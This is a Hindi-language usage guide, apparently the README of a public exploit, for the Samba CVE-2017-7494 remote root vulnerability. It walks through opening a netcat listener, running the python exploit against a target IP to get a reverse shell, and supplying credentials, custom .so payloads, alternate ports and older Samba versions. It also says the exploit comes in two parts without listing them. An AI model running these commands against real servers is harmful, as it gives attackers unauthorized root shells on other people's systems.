
SAMBA CVE-2017-7494 भेद्यता के लिए रिमोट रूट एक्सप्लॉइट
SAMBA CVE-2017-7494 भेद्यता के लिए रिमोट रूट शोषण।
यह शोषण 2 भागों में विभाजित है:
जब तक लक्ष्य भेद्य है और पेलोड लक्ष्य ऑपरेटिंग सिस्टम और आर्किटेक्चर के लिए सही है, शोषण 100% विश्वसनीय है।
अपनी मशीन में, निम्नलिखित कमांड चलाएँ:
$ nc -p 31337 -l
फिर, अपने लक्ष्य के विरुद्ध शोषण चलाएँ और जब तक यह आपके Netcat से वापस कनेक्ट न हो जाए, प्रतीक्षा करें:
$ python cve_2017_7494.py -t target_ip
यदि आप रिवर्स शेल को बहुत जल्दी बंद कर देते हैं, तो शोषण को फिर से चलाकर मॉड्यूल अपलोड करने के बजाय, आप उस मॉड्यूल का पथ पास कर सकते हैं जो पहले से अपलोड हो चुका है। मान लीजिए कि इसे /shared/directory/ पर "module.so" के रूप में अपलोड किया गया था, तो आप निम्नलिखित कमांड चलाएँगे:
$ python cve_2017_7494.py -t target_ip -m /shared/directory/module.so
अब आप samba 3.5.0 और 3.6.0 के विरुद्ध शोषण चला सकते हैं, आपको बस -o 1 आर्गुमेंट जोड़ने की आवश्यकता है।
python cve_2017_7494.py -t target_ip -u test -P 123456 --rhost shell_ip --rport shell_port -o 1
अब आप अपने स्वयं के कस्टम .so का उपयोग कर सकते हैं।
python cve_2017_7494.py -t target_ip -u test -P 123456 -o 1 --custom myso.so
यदि आपको इस स्क्रिप्ट को x86 मशीन से चलाने की आवश्यकता है, तो implant बाइनरीज़ को संकलित करने पर दो x86 फ़ाइलें बनेंगी। -n 1 फ्लैग का उपयोग करके आप संकलन को अक्षम कर सकते हैं और दूसरी मशीन से libimplantx64.so कॉपी कर सकते हैं।
python cve_2017_7494.py -t target_ip -u test -P 123456 --rhost shell_ip --rport shell_port -n 1
यदि samba केवल पोर्ट 139 पर चलता है। आप -p आर्गुमेंट का उपयोग करके रिमोट सर्वर पोर्ट सेट कर सकते हैं।
python cve_2017_7494.py -t target_ip -p 139 -u test -P 123456 --rhost shell_ip --rport shell_port -n 1
मैं अब इसका समर्थन नहीं करता।
-- Joxean Koret